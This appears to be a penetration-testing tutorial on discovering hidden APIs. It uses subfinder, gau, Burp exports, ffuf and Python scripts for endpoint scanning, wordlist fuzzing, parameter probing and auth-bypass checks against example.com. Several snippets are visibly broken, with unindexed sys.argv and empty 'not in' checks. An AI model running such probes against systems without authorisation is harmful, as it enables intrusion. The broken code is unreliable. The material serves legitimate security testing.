Shadow API discovery is a critical phase in modern penetration testing, moving beyond officially documented endpoints to uncover hidden or unadvertised API surfaces. This isn't about parsing an OpenAPI spec; it's about active reconnaissance and traffic analysis to expose APIs not meant for public consumption or those residing on overlooked subdomains. Python, with its robust HTTP libraries, regular expression capabilities, and automation potential, serves as an invaluable asset in this hunt, transforming tedious manual analysis into repeatable, scalable scripts.
Initial Foothold: Passive Recon for API Leads
Before hitting targets with active requests, gather intelligence passively. Identifying subdomains often reveals internal-facing applications or forgotten API gateways. Similarly, static assets like JavaScript files frequently contain hardcoded API paths that aren't immediately obvious from network traffic.
Subdomain Enumeration for API Gateways
Tools like subfinder or assetfinder efficiently enumerate subdomains. The output from these tools can then be piped into a Python script for further analysis, particularly looking for keywords like api, dev, test, or specific product names. We're sifting for domains that might host API instances rather than user-facing web applications.
subfinder -d example.com -silent | tee subdomains.txt
Once you have a list of subdomains, a quick Python script can perform HTTP status checks and categorize them. This helps prune non-responsive or irrelevant hosts before deeper dives.
import requests
import sys
from concurrent.futures import ThreadPoolExecutor
def check_subdomain(subdomain):
url = f"http://{subdomain}"
try:
response = requests.get(url, timeout=5, allow_redirects=True)
print(f"[+] {url} - Status: {response.status_code}")
return url, response.status_code
except requests.exceptions.RequestException as e:
# print(f"[-] {url} - Error: {e}") # Uncomment for verbose error
return url, None
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python subdomain_checker.py <subdomains_file.txt>")
sys.exit(1)
subdomains_file = sys.argv
with open(subdomains_file, 'r') as f:
subdomains = [line.strip() for line in f if line.strip()]
print(f"Checking {len(subdomains)} subdomains...")
with ThreadPoolExecutor(max_workers=20) as executor:
results = list(executor.map(check_subdomain, subdomains))
# Optional: Further processing of results, e.g., filtering 200s
JavaScript Scrutiny for Hidden Endpoints
JavaScript files are a goldmine for undocumented API endpoints. Developers often hardcode paths, sensitive strings, or even full API schemas within client-side code. After identifying JavaScript files from crawled pages or identified subdomains, fetch them and apply regular expressions to extract potential API paths.
Tools like waybackurls, gau, or getallurls (go install github.com/lc/gau@latest) can quickly pull URLs, including JS files, associated with a domain. We'll then use Python to automate fetching and scanning these scripts.
gau example.com | grep '.js$' | tee js_files.txt
import requests
import re
import sys
from concurrent.futures import ThreadPoolExecutor
# Regex patterns for common API endpoint structures
# Examples: /api/v1/users, /users/id, /endpoint
API_PATTERNS = [
re.compile(r'/(?:api|v\d+)/[a-zA-Z0-9_\-/]+'),
re.compile(r'/[a-zA-Z0-9_\-]+/v\d+/[a-zA-Z0-9_\-/]+'), # e.g., /service/v1/resource
re.compile(r'/[a-zA-Z0-9_\-]+/(?:create|read|update|delete|get|post|put|patch|info|data)'), # common actions
re.compile(r'"(?:/api|/v\d+|/[a-zA-Z0-9_\-]+/(?:api|v\d+))/[a-zA-Z0-9_\-/]+\b"') # paths in quotes
]
def fetch_and_scan_js(js_url):
try:
response = requests.get(js_url, timeout=10)
if response.status_code == 200 and 'javascript' in response.headers.get('Content-Type', ''):
print(f"[+] Processing JS: {js_url}")
found_endpoints = set()
for pattern in API_PATTERNS:
matches = pattern.finditer(response.text)
for match in matches:
endpoint = match.group(0).strip('"') # Remove quotes if matched with quote pattern
if endpoint.startswith('/') and len(endpoint) > 2: # Basic sanity check
found_endpoints.add(endpoint)
return list(found_endpoints)
else:
# print(f"[-] Not a valid JS file or non-200 status for {js_url}") # Verbose error
pass
except requests.exceptions.RequestException as e:
# print(f"[-] Error fetching {js_url}: {e}") # Verbose error
pass
return []
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python js_scanner.py <js_urls_file.txt>")
sys.exit(1)
js_urls_file = sys.argv
with open(js_urls_file, 'r') as f:
js_urls = [line.strip() for line in f if line.strip()]
print(f"Scanning {len(js_urls)} JavaScript files for API endpoints...")
all_discovered_endpoints = set()
with ThreadPoolExecutor(max_workers=10) as executor:
for endpoints_list in executor.map(fetch_and_scan_js, js_urls):
all_discovered_endpoints.update(endpoints_list)
print("\n--- Discovered API Endpoints ---")
for ep in sorted(list(all_discovered_endpoints)):
print(ep)
Active Analysis: Intercepting and Deciphering Traffic
Passive reconnaissance provides leads; active traffic analysis confirms and expands them. Proxy tools are indispensable here, but raw proxy logs quickly become unmanageable. Python can process these logs efficiently.
Proxying with a Purpose (Burp Suite)
Route all browser traffic, mobile app traffic, or even command-line tool traffic through Burp Suite. This captures every HTTP request and response. The crucial part is not just capturing, but observing patterns. Look for:
- Requests to non-standard ports or subdomains.
- JSON or XML request/response bodies.
- Authorization headers (
Bearertokens, API keys). - Unusual HTTP methods (
PATCH,PROPFIND).
Exporting Burp's HTTP history, typically in XML format, allows for programmatic analysis. While Burp offers extensions for deeper analysis, external Python scripting gives more flexibility and integration with other custom tools.
# Manual steps in Burp Suite:
# 1. Proxy -> HTTP history
# 2. Right-click anywhere in the history table -> "Save item" -> "All items"
# 3. Choose a file name (e.g., burp_history.xml)
Programmatic Traffic Analysis with Python
Once Burp history is exported, Python can parse the XML and extract interesting data. We're looking for unique endpoints, parameters, and headers that signal API interaction. The xml.etree.ElementTree module is standard for XML parsing in Python.
import xml.etree.ElementTree as ET
import re
import sys
from urllib.parse import urlparse, parse_qs
def analyze_burp_history(xml_file):
tree = ET.parse(xml_file)
root = tree.getroot()
discovered_endpoints = set()
discovered_parameters = set()
print(f"Analyzing Burp Suite history from {xml_file}...")
for item in root.findall('item'):
host = item.find('host').text
port = item.find('port').text
protocol = item.find('protocol').text
url_path = item.find('url').text # Full URL from Burp
parsed_url = urlparse(url_path)
path = parsed_url.path
query_params = parse_qs(parsed_url.query)
full_endpoint = f"{protocol}://{host}:{port}{path}"
discovered_endpoints.add(full_endpoint)
for param_name in query_params:
discovered_parameters.add(param_name)
# Look for parameters in POST bodies if available
request_base64 = item.find('request').text
if request_base64:
# Burp's request/response elements are often Base64 encoded
import base64
try:
decoded_request = base64.b64decode(request_base64).decode('utf-8', errors='ignore')
# Simple regex to find common parameter patterns in POST body (e.g., key=value or "key":"value")
body_params = re.findall(r'(?:[a-zA-Z0-9_\-]+)=(?:[^&]+)|"(?:[a-zA-Z0-9_\-]+)":"(?:[^"]+)"', decoded_request)
for param in body_params:
# Extract just the key part
if '=' in param:
discovered_parameters.add(param.split('='))
elif ':' in param:
discovered_parameters.add(param.split(':').strip('"'))
except Exception as e:
# print(f"Error decoding request: {e}") # Verbose error
pass
print("\n--- Unique Discovered Endpoints ---")
for ep in sorted(list(discovered_endpoints)):
print(ep)
print("\n--- Unique Discovered Parameters ---")
for param in sorted(list(discovered_parameters)):
print(param)
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python burp_parser.py <burp_history.xml>")
sys.exit(1)
burp_file = sys.argv
analyze_burp_history(burp_file)
Probing the Unknown: Fuzzing for Shadow Endpoints
Even after extensive passive and active analysis, many API endpoints remain hidden. These often follow predictable patterns but are simply not linked or referenced. Fuzzing with intelligent wordlists becomes crucial here.
Intelligent Wordlist Generation
Generic wordlists are a start, but custom, target-specific wordlists are far more effective. The previously extracted parameters and common API keywords (user, admin, v1, auth, dashboard, report) are excellent seeds. Combine these with common HTTP verbs and known API conventions to generate targeted lists.
import itertools
def generate_api_wordlist(base_paths, common_terms, versions):
wordlist = set()
# Base paths with common terms
for path in base_paths:
for term in common_terms:
wordlist.add(f"{path}/{term}")
wordlist.add(f"{path}/v1/{term}") # Common versioning
for ver in versions:
wordlist.add(f"{path}/{ver}/{term}")
# Combinations of terms and versions
for term_combo in itertools.permutations(common_terms, 2):
wordlist.add(f"/{term_combo}/{term_combo}")
for ver in versions:
wordlist.add(f"/{ver}/{term_combo}/{term_combo}")
# Add common API route segments directly
for term in common_terms:
wordlist.add(f"/api/{term}")
wordlist.add(f"/{term}s") # Plural forms
for ver in versions:
wordlist.add(f"/api/{ver}/{term}")
wordlist.add(f"/{ver}/{term}")
return sorted(list(wordlist))
if __name__ == "__main__":
base_paths_discovered = ["/api", "/admin", "/service"] # From prior recon
common_api_terms = ["users", "products", "orders", "auth", "login", "register", "status", "data", "report", "config"]
api_versions = ["v1", "v2", "v3", "alpha", "beta"]
custom_wordlist = generate_api_wordlist(base_paths_discovered, common_api_terms, api_versions)
with open("custom_api_wordlist.txt", "w") as f:
for item in custom_wordlist:
f.write(item + "\n")
print(f"Generated custom API wordlist with {len(custom_wordlist)} entries: custom_api_wordlist.txt")
# Example entries from the generated list
print("\nExample entries:")
for i in range(min(10, len(custom_wordlist))):
print(custom_wordlist[i])
Targeted Endpoint Fuzzing with ffuf and Python
ffuf is an incredibly fast fuzzer ideal for discovering hidden endpoints. Pair it with the custom wordlists generated above. Focus on common API prefixes like /api/, /v1/, or subdomains identified as potential API gateways.
# Example ffuf command targeting a base API path
# -w: wordlist
# -u: URL with FUZZ keyword
# -H: Add header (e.g., Content-Type for JSON APIs)
# -mc: Match status codes (e.g., 200, 401, 403, 500 can indicate API presence)
# -recursion: Follow redirects and fuzz again (useful but can be noisy)
# -recursion-depth: Depth for recursion
# -sa: Skip asset extensions (e.g., .js, .css)
# -fs: Filter size (e.g., ignore common 404 page sizes)
ffuf -w custom_api_wordlist.txt -u https://api.example.comFUZZ -H "Content-Type: application/json" -mc 200,401,403,500 -fs 1234,4567 -o api_fuzz_results.json -of json
The -of json flag for ffuf makes output parsing straightforward. A Python script can then ingest these results, filter out noise, and identify unique, responsive endpoints. Focus on non-404/non-302 responses that don't match typical static asset sizes or known error page sizes.
import json
import sys
def parse_ffuf_results(json_file):
discovered_endpoints = set()
with open(json_file, 'r') as f:
data = json.load(f)
print(f"Parsing ffuf results from {json_file}...")
for result in data['results']:
url = result['url']
status_code = result['status']
length = result['length']
# Heuristic: Filter out common 404-like responses by status and/or size
# Adjust 'known_404_sizes' based on your target's typical error page sizes
known_404_sizes = {1234, 4567, 8910} # Example sizes to filter
if status_code not in and length not in known_404_sizes:
discovered_endpoints.add(url)
# Optionally print more details
# print(f"Found: {url} (Status: {status_code}, Size: {length})")
print("\n--- Fuzzed Discovered API Endpoints ---")
for ep in sorted(list(discovered_endpoints)):
print(ep)
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python ffuf_parser.py <ffuf_output.json>")
sys.exit(1)
ffuf_output_file = sys.argv
parse_ffuf_results(ffuf_output_file)
Beyond Discovery: Parameter and Authentication Nuances
Uncovering Hidden Parameters
Discovering an endpoint is only half the battle. Many APIs hide parameters. Once an endpoint is identified, probe it with common API parameter names (e.g., id, user_id, token, callback, format, debug) using various HTTP methods. Python's requests library makes this trivial, allowing rapid iteration through potential parameters and values.
import requests
def test_parameters(endpoint, common_params, headers=None):
print(f"Testing parameters for: {endpoint}")
found_params = []
for param in common_params:
# Test with a GET request
try:
params = {param: "testvalue"}
response = requests.get(endpoint, params=params, headers=headers, timeout=5)
if response.status_code not in: # Look for non-explicit errors
print(f" [+] GET with '{param}' (Status: {response.status_code})")
found_params.append(param)
except requests.exceptions.RequestException:
pass
# Test with a POST request (if the endpoint might accept POST)
try:
data = {param: "testvalue"}
response = requests.post(endpoint, json=data, headers=headers, timeout=5)
if response.status_code not in:
print(f" [+] POST with '{param}' (Status: {response.status_code})")
if param not in found_params:
found_params.append(param)
except requests.exceptions.RequestException:
pass
return found_params
if __name__ == "__main__":
target_endpoint = "https://api.example.com/v1/users" # Example from earlier discovery
common_api_parameters = ["id", "user_id", "name", "email", "query", "limit", "offset",
"callback", "debug", "version", "sort_by", "filter"]
# Example headers (e.g., if you have a known API key or JWT)
# auth_headers = {"Authorization": "Bearer YOUR_TOKEN_HERE"}
auth_headers = None # Start without auth if unknown
discovered = test_parameters(target_endpoint, common_api_parameters, auth_headers)
if discovered:
print(f"\nDiscovered parameters for {target_endpoint}: {', '.join(discovered)}")
else:
print(f"\nNo new parameters discovered for {target_endpoint}.")
Scripted Auth Testing
Shadow APIs often have weaker or misconfigured authentication. Once an API is discovered, Python scripts can be used to test various authentication bypasses: no authentication, invalid tokens, default credentials, or even iterating through common weak JWTs. This requires a targeted approach for each discovered API, potentially chaining with previously found authorization headers or cookies.
import requests
def test_auth_bypass(endpoint, method="GET", json_data=None, headers=None):
print(f"Testing auth bypass for {method} {endpoint}")
try:
if method.upper() == "GET":
response = requests.get(endpoint, headers=headers, timeout=7)
elif method.upper() == "POST":
response = requests.post(endpoint, json=json_data, headers=headers, timeout=7)
else:
print(f"Unsupported method: {method}")
return
print(f" [+] Status: {response.status_code}")
print(f" [+] Response snippet: {response.text[:200]}...") # Show first 200 chars
if response.status_code == 200:
print(" [!!!] Potential bypass: 200 OK without expected authentication.")
elif response.status_code == 401:
print(" [-] Authentication required (401 Unauthorized).")
elif response.status_code == 403:
print(" [-] Forbidden (403 Forbidden).")
except requests.exceptions.RequestException as e:
print(f" [-] Request error: {e}")
if __name__ == "__main__":
sensitive_endpoint = "https://api.example.com/v1/admin/users" # Found admin endpoint
print("--- Testing without any authentication ---")
test_auth_bypass(sensitive_endpoint, method="GET")
print("\n--- Testing with a potentially invalid/expired token ---")
invalid_headers = {"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.invalid.signature"}
test_auth_bypass(sensitive_endpoint, method="GET", headers=invalid_headers)
# Example of testing a POST endpoint if relevant
# post_data = {"action": "list_all_users"}
# print("\n--- Testing POST with a potentially invalid token ---")
# test_auth_bypass(sensitive_endpoint, method="POST", json_data=post_data, headers=invalid_headers)